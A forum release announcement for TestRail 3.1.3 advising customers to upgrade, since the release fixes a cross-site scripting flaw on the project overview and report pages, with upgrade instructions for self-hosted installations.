Join 34,000+ subscribers and receive articles from our
blog about software quality, testing, QA and security.

TestRail 3.1.3 released


#1

Hello,

This release is a security related update and we highly recommend all customers to upgrade to the latest version. All TestRail Hosted accounts have already been updated automatically.

What’s new in TestRail 3.1.3
Please see below for the changes of this version.

[list=]
[
]Fixed: Invalid escaping of user-submitted strings resulting in a XSS vulnerability (project overview page, project summary report, report filters)[/*]
[/list]

Based on feedback from an external security review, we have released this TestRail update that fixes a XSS (cross-site scripting) bug in TestRail. The problem would allow existing TestRail users to inject custom HTML or JavaScript into a small number of pages and this could potentially be used to retrieve session or user information.

Please note that this issue can only be used by users who already have access to your TestRail instance.

Due to the security-sensitive nature of this update, all customers with self-hosted installations are highly encouraged to update to the new version. Please contact us in case you have any questions or need help with this.

All TestRail Hosted accounts (our cloud/SaaS edition) are already running the new version and there’s nothing TestRail Hosted customers need to do.

Updating to the new version
If you are using the download version of TestRail, you can update to the new version as usual by installing it over your existing TestRail installation (there’s no need to uninstall your existing installation). The database upgrade wizard is automatically started when you access TestRail with your web browser in case a database upgrade is needed. Please see the update instructions for details:

http://docs.gurock.com/testrail-admin/installation-upgrading/

Please take the time to make a backup of your current installation before upgrading to the new version.

Regards,
Tobias